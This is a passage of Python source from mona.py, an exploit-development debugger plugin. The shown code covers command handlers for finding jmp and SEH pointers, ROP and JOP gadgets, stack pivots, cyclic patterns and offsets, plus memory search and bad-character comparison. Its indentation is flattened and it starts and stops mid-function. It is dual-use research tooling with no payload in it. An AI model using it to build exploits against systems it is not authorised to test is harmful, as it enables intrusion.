setbp = True
elif crit.startswith("*"):
if funcname.endswith(tcrit):
setbp = True
elif crit.endswith("*"):
if funcname.startswith(tcrit):
setbp = True
if setbp:
if type == "export":
if not func in bpfuncs:
bpfuncs[func] = funcs[func]
else:
ptr = 0
try:
#read pointer of imported function
ptr=struct.unpack('<L',dbg.readMemory(func,4))[0]
except:
pass
if ptr > 0:
if not ptr in bpfuncs:
bpfuncs[ptr] = funcs[func]
if __DEBUGGERAPP__ == "WinDBG":
# let's do a few searches
for crit in namecrit:
if crit.find("*") == -1:
crit = "*" + crit + "*"
modsearch = "x %s!%s" % (shortname,crit)
output = dbg.nativeCommand(modsearch)
outputlines = output.split("\n")
for line in outputlines:
if line.replace(" ","") != "":
linefields = line.split(" ")
if len(linefields) > 1:
ptr = hexStrToInt(linefields[0])
cnt = 1
while cnt < len(linefields)-1:
if linefields[cnt] != "":
funcname = linefields[cnt]
break
cnt += 1
if not ptr in bpfuncs:
bpfuncs[ptr] = funcname
if not silent:
dbg.log("[+] Total nr of breakpoints to process : %d" % len(bpfuncs))
if len(bpfuncs) > 0:
for funcptr in bpfuncs:
if mode == "add":
dbg.log("Set bp at 0x%s (%s in %s)" % (toHex(funcptr),bpfuncs[funcptr],MnPointer(funcptr).belongsTo()))
try:
dbg.setBreakpoint(funcptr)
except:
dbg.log("Failed setting bp at 0x%s" % toHex(funcptr))
elif mode == "del":
dbg.log("Remove bp at 0x%s (%s in %s)" % (toHex(funcptr),bpfuncs[funcptr],MnPointer(funcptr).belongsTo()))
try:
dbg.deleteBreakpoint(funcptr)
except:
dbg.log("Skipped removal of bp at 0x%s" % toHex(funcptr))
elif mode == "list":
dbg.log("Match found at 0x%s (%s in %s)" % (toHex(funcptr),bpfuncs[funcptr],MnPointer(funcptr).belongsTo()))
return
#-----------------------------------------------------------------------#
# main
#-----------------------------------------------------------------------#
def main(args):
dbg.createLogWindow()
global currentArgs
currentArgs = copy.copy(args)
try:
starttime = datetime.datetime.now()
ptr_counter = 0
# initialize list of commands
commands = {}
# ----- HELP ----- #
def getBanner():
banners = {}
bannertext = ""
bannertext += " |------------------------------------------------------------------|\n"
bannertext += " | __ __ |\n"
bannertext += " | _________ ________ / /___ _____ / /____ ____ _____ ___ |\n"
bannertext += " | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |\n"
bannertext += " | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n"
bannertext += " | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n"
bannertext += " | |\n"
bannertext += " | https://www.corelan.be | https://www.corelan-training.com |\n"
bannertext += " |------------------------------------------------------------------|\n"
banners[0] = bannertext
bannertext = ""
bannertext += " |------------------------------------------------------------------|\n"
bannertext += " | _ __ ___ ___ _ __ __ _ _ __ _ _ |\n"
bannertext += " | | '_ ` _ \ / _ \ | '_ \ / _` | | '_ \ | | | | |\n"
bannertext += " | | | | | | || (_) || | | || (_| | _ | |_) || |_| | |\n"
bannertext += " | |_| |_| |_| \___/ |_| |_| \__,_|(_)| .__/ \__, | |\n"
bannertext += " | |_| |___/ |\n"
bannertext += " | |\n"
bannertext += " |------------------------------------------------------------------|\n"
banners[1] = bannertext
bannertext = ""
bannertext += " |------------------------------------------------------------------|\n"
bannertext += " | |\n"
bannertext += " | _____ ___ ____ ____ ____ _ |\n"
bannertext += " | / __ `__ \/ __ \/ __ \/ __ `/ https://www.corelan.be |\n"
bannertext += " | / / / / / / /_/ / / / / /_/ / https://www.corelan-training.com|\n"
bannertext += " | /_/ /_/ /_/\____/_/ /_/\__,_/ #corelan (Freenode IRC) |\n"
bannertext += " | |\n"
bannertext += " |------------------------------------------------------------------|\n"
banners[2] = bannertext
bannertext = ""
bannertext += "\n .##.....##..#######..##....##....###........########..##....##\n"
bannertext += " .###...###.##.....##.###...##...##.##.......##.....##..##..##.\n"
bannertext += " .####.####.##.....##.####..##..##...##......##.....##...####..\n"
bannertext += " .##.###.##.##.....##.##.##.##.##.....##.....########.....##...\n"
bannertext += " .##.....##.##.....##.##..####.#########.....##...........##...\n"
bannertext += " .##.....##.##.....##.##...###.##.....##.###.##...........##...\n"
bannertext += " .##.....##..#######..##....##.##.....##.###.##...........##...\n\n"
banners[3] = bannertext
# pick random banner
bannerlist = []
for i in range (0, len(banners)):
bannerlist.append(i)
random.shuffle(bannerlist)
return banners[bannerlist[0]]
def procHelp(args):
dbg.log(" 'mona' - Exploit Development Swiss Army Knife - %s (%sbit)" % (__DEBUGGERAPP__,str(arch)))
dbg.log(" Plugin version : %s r%s" % (__VERSION__,__REV__))
if __DEBUGGERAPP__ == "WinDBG":
pykdversion = dbg.getPyKDVersionNr()
dbg.log(" PyKD version %s" % pykdversion)
dbg.log(" Written by Corelan - https://www.corelan.be")
dbg.log(" Project page : https://github.com/corelan/mona")
dbg.logLines(getBanner(),highlight=1)
dbg.log("Global options :")
dbg.log("----------------")
dbg.log("You can use one or more of the following global options on any command that will perform")
dbg.log("a search in one or more modules, returning a list of pointers :")
dbg.log(" -n : Skip modules that start with a null byte. If this is too broad, use")
dbg.log(" option -cp nonull instead")
dbg.log(" -o : Ignore OS modules")
dbg.log(" -p <nr> : Stop search after <nr> pointers.")
dbg.log(" -m <module,module,...> : only query the given modules. Be sure what you are doing !")
dbg.log(" You can specify multiple modules (comma separated)")
dbg.log(" Tip : you can use -m * to include all modules. All other module criteria will be ignored")
dbg.log(" Other wildcards : *blah.dll = ends with blah.dll, blah* = starts with blah,")
dbg.log(" blah or *blah* = contains blah")
dbg.log(" -cm <crit,crit,...> : Apply some additional criteria to the modules to query.")
dbg.log(" You can use one or more of the following criteria :")
dbg.log(" aslr,safeseh,rebase,nx,os")
dbg.log(" You can enable or disable a certain criterium by setting it to true or false")
dbg.log(" Example : -cm aslr=true,safeseh=false")
dbg.log(" Suppose you want to search for p/p/r in aslr enabled modules, you could call")
dbg.log(" !mona seh -cm aslr")
dbg.log(" -cp <crit,crit,...> : Apply some criteria to the pointers to return")
dbg.log(" Available options are :")
dbg.log(" unicode,ascii,asciiprint,upper,lower,uppernum,lowernum,numeric,alphanum,nonull,startswithnull,unicoderev")
dbg.log(" Note : Multiple criteria will be evaluated using 'AND', except if you are looking for unicode + one crit")
dbg.log(" -cpb '\\x00\\x01' : Provide list with bad chars, applies to pointers")
dbg.log(" You can use .. to indicate a range of bytes (in between 2 bad chars)")
dbg.log(" -x <access> : Specify desired access level of the returning pointers. If not specified,")
dbg.log(" only executable pointers will be returned.")
dbg.log(" Access levels can be one of the following values : R,W,X,RW,RX,WX,RWX or *")
if not args:
args = []
if len(args) > 1:
thiscmd = args[1].lower().strip()
if thiscmd in commands:
dbg.log("")
dbg.log("Usage of command '%s' :" % thiscmd)
dbg.log("%s" % ("-" * (22 + len(thiscmd))))
dbg.logLines(commands[thiscmd].usage)
dbg.log("")
else:
aliasfound = False
for cmd in commands:
if commands[cmd].alias == thiscmd:
dbg.log("")
dbg.log("Usage of command '%s' :" % thiscmd)
dbg.log("%s" % ("-" * (22 + len(thiscmd))))
dbg.logLines(commands[cmd].usage)
dbg.log("")
aliasfound = True
if not aliasfound:
dbg.logLines("\nCommand %s does not exist. Run !mona to get a list of available commands\n" % thiscmd,highlight=1)
else:
dbg.logLines("\nUsage :")
dbg.logLines("-------\n")
dbg.log(" !mona <command> <parameter>")
dbg.logLines("\nAvailable commands and parameters :\n")
items = commands.items()
items.sort(key = itemgetter(0))
for item in items:
if commands[item[0]].usage <> "":
aliastxt = ""
if commands[item[0]].alias != "":
aliastxt = " / " + commands[item[0]].alias
dbg.logLines("%s | %s" % (item[0] + aliastxt + (" " * (20 - len(item[0]+aliastxt))), commands[item[0]].description))
dbg.log("")
dbg.log("Want more info about a given command ? Run !mona help <command>",highlight=1)
dbg.log("")
commands["help"] = MnCommand("help", "show help", "!mona help [command]",procHelp)
# ----- Config file management ----- #
def procConfig(args):
#did we specify -get, -set or -add?
showerror = False
if not "set" in args and not "get" in args and not "add" in args:
showerror = True
if "set" in args:
if type(args["set"]).__name__.lower() == "bool":
showerror = True
else:
#count nr of words
params = args["set"].split(" ")
if len(params) < 2:
showerror = True
if "add" in args:
if type(args["add"]).__name__.lower() == "bool":
showerror = True
else:
#count nr of words
params = args["add"].split(" ")
if len(params) < 2:
showerror = True
if "get" in args:
if type(args["get"]).__name__.lower() == "bool":
showerror = True
else:
#count nr of words
params = args["get"].split(" ")
if len(params) < 1:
showerror = True
if showerror:
dbg.log("Usage :")
dbg.logLines(configUsage,highlight=1)
return
else:
if "get" in args:
dbg.log("Reading value from configuration file")
monaConfig = MnConfig()
thevalue = monaConfig.get(args["get"])
dbg.log("Parameter %s = %s" % (args["get"],thevalue))
if "set" in args:
dbg.log("Writing value to configuration file")
monaConfig = MnConfig()
value = args["set"].split(" ")
configparam = value[0].strip()
dbg.log("Old value of parameter %s = %s" % (configparam,monaConfig.get(configparam)))
configvalue = args["set"][0+len(configparam):len(args["set"])]
monaConfig.set(configparam,configvalue)
dbg.log("New value of parameter %s = %s" % (configparam,configvalue))
if "add" in args:
dbg.log("Writing value to configuration file")
monaConfig = MnConfig()
value = args["add"].split(" ")
configparam = value[0].strip()
dbg.log("Old value of parameter %s = %s" % (configparam,monaConfig.get(configparam)))
configvalue = monaConfig.get(configparam).strip() + "," + args["add"][0+len(configparam):len(args["add"])].strip()
monaConfig.set(configparam,configvalue)
dbg.log("New value of parameter %s = %s" % (configparam,configvalue))
# ----- Jump to register ----- #
def procFindJ(args):
return procFindJMP(args)
def procFindJMP(args):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
if (inspect.stack()[1][3] == "procFindJ"):
dbg.log(" ** Note : command 'j' has been replaced with 'jmp'. Now launching 'jmp' instead...",highlight=1)
criteria={}
all_opcodes={}
global ptr_to_get
ptr_to_get = -1
distancestr = ""
mindistance = 0
maxdistance = 0
#did user specify -r <reg> ?
showerror = False
if "r" in args:
if type(args["r"]).__name__.lower() == "bool":
showerror = True
else:
#valid register ?
thisreg = args["r"].upper().strip()
validregs = dbglib.Registers32BitsOrder
if not thisreg in validregs:
showerror = True
else:
showerror = True
if "distance" in args:
if type(args["distance"]).__name__.lower() == "bool":
showerror = True
else:
distancestr = args["distance"]
distanceparts = distancestr.split(",")
for parts in distanceparts:
valueparts = parts.split("=")
if len(valueparts) > 1:
if valueparts[0].lower() == "min":
try:
mindistance = int(valueparts[1])
except:
mindistance = 0
if valueparts[0].lower() == "max":
try:
maxdistance = int(valueparts[1])
except:
maxdistance = 0
if maxdistance < mindistance:
tmp = maxdistance
maxdistance = mindistance
mindistance = tmp
criteria["mindistance"] = mindistance
criteria["maxdistance"] = maxdistance
if showerror:
dbg.log("Usage :")
dbg.logLines(jmpUsage,highlight=1)
return
else:
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
# go for it !
all_opcodes=findJMP(modulecriteria,criteria,args["r"].lower().strip())
# write to log
logfile = MnLog("jmp.txt")
thislog = logfile.reset()
processResults(all_opcodes,logfile,thislog)
# ----- Exception Handler Overwrites ----- #
def procFindSEH(args):
#default criteria
modulecriteria={}
modulecriteria["safeseh"] = False
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
criteria = {}
specialcases = {}
all_opcodes = {}
global ptr_to_get
ptr_to_get = -1
#what is the caller function (backwards compatibility with pvefindaddr)
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if "rop" in args:
criteria["rop"] = True
if "all" in args:
criteria["all"] = True
specialcases["maponly"] = True
else:
criteria["all"] = False
specialcases["maponly"] = False
# go for it !
all_opcodes = findSEH(modulecriteria,criteria)
#report findings to log
logfile = MnLog("seh.txt")
thislog = logfile.reset()
processResults(all_opcodes,logfile,thislog,specialcases)
# ----- MODULES ------ #
def procShowMODULES(args):
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
# ----- ROP ----- #
def procFindROPFUNC(args):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
#modulecriteria["rebase"] = False
modulecriteria["os"] = False
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
ropfuncs = {}
ropfuncoffsets ={}
ropfuncs,ropfuncoffsets = findROPFUNC(modulecriteria,criteria)
#report findings to log
dbg.log("[+] Processing pointers to interesting rop functions")
logfile = MnLog("ropfunc.txt")
thislog = logfile.reset()
processResults(ropfuncs,logfile,thislog)
global silent
silent = True
dbg.log("[+] Processing offsets to pointers to interesting rop functions")
logfile = MnLog("ropfunc_offset.txt")
thislog = logfile.reset()
processResults(ropfuncoffsets,logfile,thislog)
def procStackPivots(args):
procROP(args,"stackpivot")
def procROP(args,mode="all"):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
modulecriteria["os"] = False
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
# handle optional arguments
depth = 6
maxoffset = 40
thedistance = 8
split = False
fast = False
endingstr = ""
endings = []
if "depth" in args:
if type(args["depth"]).__name__.lower() != "bool":
try:
depth = int(args["depth"])
except:
pass
if "offset" in args:
if type(args["offset"]).__name__.lower() != "bool":
try:
maxoffset = int(args["offset"])
except:
pass
if "distance" in args:
if type(args["distance"]).__name__.lower() != "bool":
try:
thedistance = args["distance"]
except:
pass
if "split" in args:
if type(args["split"]).__name__.lower() == "bool":
split = args["split"]
if "fast" in args:
if type(args["fast"]).__name__.lower() == "bool":
fast = args["fast"]
if "end" in args:
if type(args["end"]).__name__.lower() == "str":
endingstr = args["end"].replace("'","").replace('"',"").strip()
endings = endingstr.split("#")
if "f" in args:
if args["f"] <> "":
criteria["f"] = args["f"]
if "rva" in args:
criteria["rva"] = True
if mode == "stackpivot":
fast = False
endings = ""
split = False
else:
mode = "all"
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
def procJOP(args,mode="all"):
#default criteria
modulecriteria={}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
modulecriteria["os"] = False
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
# handle optional arguments
depth = 6
if "depth" in args:
if type(args["depth"]).__name__.lower() != "bool":
try:
depth = int(args["depth"])
except:
pass
findJOPGADGETS(modulecriteria,criteria,depth)
def procCreatePATTERN(args):
size = 0
pattern = ""
if "?" in args and args["?"] != "":
try:
if "0x" in args["?"].lower():
try:
size = int(args["?"],16)
except:
size = 0
else:
size = int(args["?"])
except:
size = 0
if size == 0:
dbg.log("Please enter a valid size",highlight=1)
else:
pattern = createPattern(size,args)
dbg.log("Creating cyclic pattern of %d bytes" % size)
dbg.log(pattern)
global ignoremodules
ignoremodules = True
objpatternfile = MnLog("pattern.txt")
patternfile = objpatternfile.reset()
# ASCII
objpatternfile.write("\nPattern of " + str(size) + " bytes :\n",patternfile)
objpatternfile.write("-" * (19 + len(str(size))),patternfile)
objpatternfile.write("\nASCII:",patternfile)
objpatternfile.write("\n" + pattern,patternfile)
# Hex
patternhex = ""
for patternchar in pattern:
patternhex += str(hex(ord(patternchar))).replace("0x","\\x")
objpatternfile.write("\n\nHEX:\n",patternfile)
objpatternfile.write(patternhex,patternfile)
# Javascript
patternjs = str2js(pattern)
objpatternfile.write("\n\nJAVASCRIPT (unescape() friendly):\n",patternfile)
objpatternfile.write(patternjs,patternfile)
if not silent:
dbg.log("Note: don't copy this pattern from the log window, it might be truncated !",highlight=1)
dbg.log("It's better to open %s and copy the pattern from the file" % patternfile,highlight=1)
ignoremodules = False
return
def procOffsetPATTERN(args):
egg = ""
if "?" in args and args["?"] != "":
try:
egg = args["?"]
except:
egg = ""
if egg == "":
dbg.log("Please enter a valid target",highlight=1)
else:
findOffsetInPattern(egg,-1,args)
return
# ----- Comparing file output ----- #
def procFileCOMPARE(args):
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
allfiles=[]
tomatch=""
checkstrict=True
rangeval = 0
fast = False
if "ptronly" in args or "ptrsonly" in args:
fast = True
if "f" in args:
if args["f"] <> "":
rawfilenames=args["f"].replace('"',"")
allfiles = rawfilenames.split(',')
dbg.log("[+] Number of files to be examined : %d " % len(allfiles))
if "range" in args:
if not type(args["range"]).__name__.lower() == "bool":
strrange = args["range"].lower()
if strrange.startswith("0x") and len(strrange) > 2 :
rangeval = int(strrange,16)
else:
try:
rangeval = int(args["range"])
except:
rangeval = 0
if rangeval > 0:
dbg.log("[+] Find overlap using pointer +/- range, value %d" % rangeval)
dbg.log(" Note : this will significantly slow down the comparison process !")
else:
dbg.log("Please provide a numeric value ^(> 0) with option -range",highlight=1)
return
else:
if "contains" in args:
if type(args["contains"]).__name__.lower() == "str":
tomatch = args["contains"].replace("'","").replace('"',"")
if "nostrict" in args:
if type(args["nostrict"]).__name__.lower() == "bool":
checkstrict = not args["nostrict"]
dbg.log("[+] Instructions must match in all files ? %s" % checkstrict)
# maybe one of the arguments is a folder
callfiles = allfiles
allfiles = []
for tfile in callfiles:
if os.path.isdir(tfile):
# folder, get all files from this folder
for root,dirs,files in os.walk(tfile):
for dfile in files:
allfiles.append(os.path.join(root,dfile))
else:
allfiles.append(tfile)
if len(allfiles) > 1:
findFILECOMPARISON(modulecriteria,criteria,allfiles,tomatch,checkstrict,rangeval,fast)
else:
dbg.log("Please specify at least 2 filenames to compare",highlight=1)
# ----- Find bytes in memory ----- #
def procFind(args):
modulecriteria={}
criteria={}
pattern = ""
base = 0
offset = 0
top = TOP_USERLAND
consecutive = False
ftype = ""
level = 0
offsetlevel = 0
if not "a" in args:
args["a"] = "*"
ptronly = False
if "ptronly" in args or "ptrsonly" in args:
ptronly = True
#search for all pointers by default
if not "x" in args:
args["x"] = "*"
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if criteria["accesslevel"] == "":
return
if not "s" in args:
dbg.log("-s <search pattern (or filename)> is a mandatory argument",highlight=1)
return
pattern = args["s"]
if "unicode" in args:
criteria["unic"] = True
if "b" in args:
try:
base = int(args["b"],16)
except:
dbg.log("invalid base address: %s" % args["b"],highlight=1)
return
if "t" in args:
try:
top = int(args["t"],16)
except:
dbg.log("invalid top address: %s" % args["t"],highlight=1)
return
if "offset" in args:
if not args["offset"].__class__.__name__ == "bool":
if "0x" in args["offset"].lower():
try:
offset = 0 - int(args["offset"],16)
except:
dbg.log("invalid offset value",highlight=1)
return
else:
try:
offset = 0 - int(args["offset"])
except:
dbg.log("invalid offset value",highlight=1)
return
else:
dbg.log("invalid offset value",highlight=1)
return
if "level" in args:
try:
level = int(args["level"])
except:
dbg.log("invalid level value",highlight=1)
return
if "offsetlevel" in args:
try:
offsetlevel = int(args["offsetlevel"])
except:
dbg.log("invalid offsetlevel value",highlight=1)
return
if "c" in args:
dbg.log(" - Skipping consecutive pointers, showing size instead")
consecutive = True
if "type" in args:
if not args["type"] in ["bin","asc","ptr","instr","file"]:
dbg.log("Invalid search type : %s" % args["type"], highlight=1)
return
ftype = args["type"]
if ftype == "file":
filename = args["s"].replace('"',"").replace("'","")
#see if we can read the file
if not os.path.isfile(filename):
dbg.log("Unable to find/read file %s" % filename,highlight=1)
return
rangep2p = 0
if "p2p" in args or level > 0:
dbg.log(" - Looking for pointers to pointers")
criteria["p2p"] = True
if "r" in args:
try:
rangep2p = int(args["r"])
except:
pass
if rangep2p > 0:
dbg.log(" - Will search for close pointers (%d bytes backwards)" % rangep2p)
if "p2p" in args:
level = 1
if level > 0:
dbg.log(" - Recursive levels : %d" % level)
allpointers = findPattern(modulecriteria,criteria,pattern,ftype,base,top,consecutive,rangep2p,level,offset,offsetlevel)
logfile = MnLog("find.txt")
thislog = logfile.reset()
processResults(allpointers,logfile,thislog,{},ptronly)
return
# ---- Find instructions, wildcard search ----- #
def procFindWild(args):
modulecriteria={}
criteria={}
pattern = ""
patterntype = ""
base = 0
top = TOP_USERLAND
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if not "s" in args:
dbg.log("-s <search pattern (or filename)> is a mandatory argument",highlight=1)
return
pattern = args["s"]
patterntypes = ["bin","str"]
if "type" in args:
if type(args["type"]).__name__.lower() != "bool":
if args["type"] in patterntypes:
patterntype = args["type"]
else:
dbg.log("-type argument only takes one of these values: %s" % patterntypes,highlight=1)
return
else:
dbg.log("Please specify a valid value for -type. Valid values are %s" % patterntypes,highlight=1)
return
if patterntype == "":
if "\\x" in pattern:
patterntype = "bin"
else:
patterntype = "str"
if "b" in args:
base,addyok = getAddyArg(args["b"])
if not addyok:
dbg.log("invalid base address: %s" % args["b"],highlight=1)
return
if "t" in args:
top,addyok = getAddyArg(args["t"])
if not addyok:
dbg.log("invalid top address: %s" % args["t"],highlight=1)
return
if "depth" in args:
try:
criteria["depth"] = int(args["depth"])
except:
dbg.log("invalid depth value",highlight=1)
return
if "all" in args:
criteria["all"] = True
if "distance" in args:
if type(args["distance"]).__name__.lower() == "bool":
dbg.log("invalid distance value(s)",highlight=1)
else:
distancestr = args["distance"]
distanceparts = distancestr.split(",")
for parts in distanceparts:
valueparts = parts.split("=")
if len(valueparts) > 1:
if valueparts[0].lower() == "min":
try:
mindistance = int(valueparts[1])
except:
mindistance = 0
if valueparts[0].lower() == "max":
try:
maxdistance = int(valueparts[1])
except:
maxdistance = 0
if maxdistance < mindistance:
tmp = maxdistance
maxdistance = mindistance
mindistance = tmp
criteria["mindistance"] = mindistance
criteria["maxdistance"] = maxdistance
allpointers = findPatternWild(modulecriteria,criteria,pattern,base,top,patterntype)
logfile = MnLog("findwild.txt")
thislog = logfile.reset()
processResults(allpointers,logfile,thislog)
return
# ----- assemble: assemble instructions to opcodes ----- #
def procAssemble(args):
opcodes = ""
encoder = ""
if not 's' in args:
dbg.log("Mandatory argument -s <opcodes> missing", highlight=1)
return
opcodes = args['s']
if 'e' in args:
# TODO: implement encoder support
dbg.log("Encoder support not yet implemented", highlight=1)
return
encoder = args['e'].lowercase()
if encoder not in ["ascii"]:
dbg.log("Invalid encoder : %s" % encoder, highlight=1)
return
assemble(opcodes,encoder)
# ----- info: show information about an address ----- #
def procInfo(args):
if not "a" in args:
dbg.log("Missing mandatory argument -a", highlight=1)
return
address,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log("%s is an invalid address" % args["a"], highlight=1)
return
ptr = MnPointer(address)
modname = ptr.belongsTo()
modinfo = None
if modname != "":
modinfo = MnModule(modname)
rebase = ""
rva=0
if modinfo :
rva = address - modinfo.moduleBase
procFlags(args)
dbg.log("")
dbg.log("[+] Information about address 0x%s" % toHex(address))
dbg.log(" %s" % ptr.__str__())
thepage = dbg.getMemoryPageByAddress(address)
dbg.log(" Address is part of page 0x%08x - 0x%08x" % (thepage.getBaseAddress(),thepage.getBaseAddress()+thepage.getSize()))
section = ""
try:
section = thepage.getSection()
except:
section = ""
if section != "":
dbg.log(" Section : %s" % section)
if ptr.isOnStack():
stacks = getStacks()
stackref = ""
for tid in stacks:
currstack = stacks[tid]
if currstack[0] <= address and address <= currstack[1]:
stackref = " (Thread 0x%08x, Stack Base : 0x%08x, Stack Top : 0x%08x)" % (tid,currstack[0],currstack[1])
break
dbg.log(" This address is in a stack segment %s" % stackref)
if modinfo:
dbg.log(" Address is part of a module:")
dbg.log(" %s" % modinfo.__str__())
if rva != 0:
dbg.log(" Offset from module base: 0x%x" % rva)
if modinfo:
eatlist = modinfo.getEAT()
if address in eatlist:
dbg.log(" Address is start of function '%s' in %s" % (eatlist[address],modname))
else:
iatlist = modinfo.getIAT()
if address in iatlist:
iatentry = iatlist[address]
dbg.log(" Address is part of IAT, and contains pointer to '%s'" % iatentry)
else:
output = ""
if ptr.isInHeap():
dbg.log(" This address resides in the heap")
dbg.log("")
ptr.showHeapBlockInfo()
else:
dbg.log(" Module: None")
try:
dbg.log("")
dbg.log("[+] Disassembly:")
op = dbg.disasm(address)
opstring=getDisasmInstruction(op)
dbg.log(" Instruction at %s : %s" % (toHex(address),opstring))
except:
pass
if __DEBUGGERAPP__ == "WinDBG":
dbg.log("")
dbg.log("Output of !address 0x%08x:" % address)
output = dbg.nativeCommand("!address 0x%08x" % address)
dbg.logLines(output)
dbg.log("")
# ----- dump: Dump some memory to a file ----- #
def procDump(args):
filename = ""
if "f" not in args:
dbg.log("Missing mandatory argument -f filename", highlight=1)
return
filename = args["f"]
address = None
if "s" not in args:
dbg.log("Missing mandatory argument -s address", highlight=1)
return
startaddress = str(args["s"]).replace("0x","").replace("0X","")
if not isAddress(startaddress):
dbg.log("You have specified an invalid start address", highlight=1)
return
address = addrToInt(startaddress)
size = 0
if "n" in args:
size = int(args["n"])
elif "e" in args:
endaddress = str(args["e"]).replace("0x","").replace("0X","")
if not isAddress(endaddress):
dbg.log("You have specified an invalid end address", highlight=1)
return
end = addrToInt(endaddress)
if end < address:
dbg.log("end address %s is before start address %s" % (args["e"],args["s"]), highlight=1)
return
size = end - address
else:
dbg.log("you need to specify either the size of the copy with -n or the end address with -e ", highlight=1)
return
dumpMemoryToFile(address,size,filename)
# ----- compare : Compare contents of a file with copy in memory, indicate bad chars / corruption ----- #
def procCompare(args):
startpos = 0
filename = ""
skipmodules = False
findunicode = False
allregs = dbg.getRegs()
if "f" in args:
filename = args["f"].replace('"',"").replace("'","")
#see if we can read the file
if not os.path.isfile(filename):
dbg.log("Unable to find/read file %s" % filename,highlight=1)
return
else:
dbg.log("You must specify a valid filename using parameter -f", highlight=1)
return
if "a" in args:
startpos,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log("%s is an invalid address" % args["a"], highlight=1)
return
if "s" in args:
skipmodules = True
if "unicode" in args:
findunicode = True
compareFileWithMemory(filename,startpos,skipmodules,findunicode)
# ----- offset: Calculate the offset between two addresses ----- #
def procOffset(args):
extratext1 = ""
extratext2 = ""
isReg_a1 = False
isReg_a2 = False
regs = dbg.getRegs()
if "a1" not in args:
dbg.log("Missing mandatory argument -a1 <address>", highlight=1)
return
a1 = args["a1"]
if "a2" not in args:
dbg.log("Missing mandatory argument -a2 <address>", highlight=1)
return
a2 = args["a2"]
a1,addyok = getAddyArg(args["a1"])
if not addyok:
dbg.log("0x%08x is not a valid address" % a1, highlight=1)
return
a2,addyok = getAddyArg(args["a2"])
if not addyok:
dbg.log("0x%08x is not a valid address" % a2, highlight=1)
return
diff = a2 - a1
result=toHex(diff)
negjmpbytes = ""
if a1 > a2:
ndiff = a1 - a2
result=toHex(4294967296-ndiff)
negjmpbytes="\\x"+ result[6]+result[7]+"\\x"+result[4]+result[5]+"\\x"+result[2]+result[3]+"\\x"+result[0]+result[1]
regaction="sub"
dbg.log("Offset from 0x%08x to 0x%08x : %d (0x%s) bytes" % (a1,a2,diff,result))
if a1 > a2:
dbg.log("Negative jmp offset : %s" % negjmpbytes)
else:
dbg.log("Jmp offset : %s" % negjmpbytes)
return
# ----- bp: Set a breakpoint on read/write/exe access ----- #
def procBp(args):
isReg_a = False
regs = dbg.getRegs()
thistype = ""
if "a" not in args:
dbg.log("Missing mandatory argument -a address", highlight=1)
dbg.log("The address can be an absolute address, a register, or a modulename!functionname")
return
a = str(args["a"])
for reg in regs:
if reg.upper() == a.upper():
a=toHex(regs[reg])
isReg_a = True
break
a = a.upper().replace("0X","").lower()
if not isAddress(str(a)):
# maybe it's a modulename!function
if str(a).find("!") > -1:
modparts = str(a).split("!")
modname = modparts[0]
if not modname.lower().endswith(".dll"):
modname += ".dll"
themodule = MnModule(modname)
if themodule != None and len(modparts) > 1:
eatlist = themodule.getEAT()
funcname = modparts[1].lower()
addyfound = False
for eatentry in eatlist:
if eatlist[eatentry].lower() == funcname:
a = "%08x" % (eatentry)
addyfound = True
break
if not addyfound:
# maybe it's just a symbol, try to resolve
if __DEBUGGERAPP__ == "WinDBG":
symboladdress = dbg.resolveSymbol(a)
if symboladdress != "" :
a = symboladdress
addyfound = True
if not addyfound:
dbg.log("Please specify a valid address/register/modulename!functionname (-a)", highlight=1)
return
else:
dbg.log("Please specify a valid address/register/modulename!functionname (-a)", highlight=1)
return
else:
dbg.log("Please specify a valid address/register/modulename!functionname (-a)", highlight=1)
return
valid_types = ["READ", "WRITE", "SFX", "EXEC"]
if "t" not in args:
dbg.log("Missing mandatory argument -t type", highlight=1)
dbg.log("Valid types are: %s" % ", ".join(valid_types))
return
else:
thistype = args["t"].upper()
if not thistype in valid_types:
dbg.log("Invalid type : %s" % thistype)
return
if thistype == "EXEC":
thistype = "SFX"
a = hexStrToInt(a)
dbg.setMemBreakpoint(a,thistype[0])
dbg.log("Breakpoint set on %s of 0x%s" % (thistype,toHex(a)),highlight=1)
# ----- ct: calltrace ---- #
def procCallTrace(args):
modulecriteria={}
criteria={}
criteria["accesslevel"] = "X"
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
hooks = []
rethooks = []
showargs = 0
hookrets = False
if not "m" in args:
dbg.log(" ** Please specify what module(s) you want to include in the trace, using argument -m **",highlight=1)
return
if "a" in args:
if args["a"] != "":
try:
showargs = int(args["a"])
except:
showargs = 0
if "r" in args:
hookrets = True
toignore = []
limit_scope = True
if not "all" in args:
# fill up array
toignore.append("PeekMessage")
toignore.append("GetParent")
toignore.append("GetFocus")
toignore.append("EnterCritical")
toignore.append("LeaveCritical")
toignore.append("GetWindow")
toignore.append("CallnextHook")
toignore.append("TlsGetValue")
toignore.append("DefWindowProc")
toignore.append("SetTextColor")
toignore.append("DrawText")
toignore.append("TranslateAccel")
toignore.append("TranslateMessage")
toignore.append("DispatchMessage")
toignore.append("isChild")
toignore.append("GetSysColor")
toignore.append("SetBkColor")
toignore.append("GetDlgCtrl")
